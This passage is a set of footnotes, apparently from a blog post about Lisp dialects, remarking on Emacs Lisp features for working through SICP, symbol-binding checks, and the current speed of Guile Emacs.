[2]At least you could now solve SICP in Emacs Lisp with less footguns: You have bignums, lexical scoping by default and TCO!
[3]This isn’t exactly correct, what’s tested for is whether the symbol has its function/value slot bound which may contain other things, for example macros and keywords.
[4]Consider that people like to advocate for Guile Emacs with the argument that it will make for a faster Emacs. While this may hold true in the long term, it’s nowhere near close to that yet. Here’s hoping that Guile 3 will alleviate some of the pain…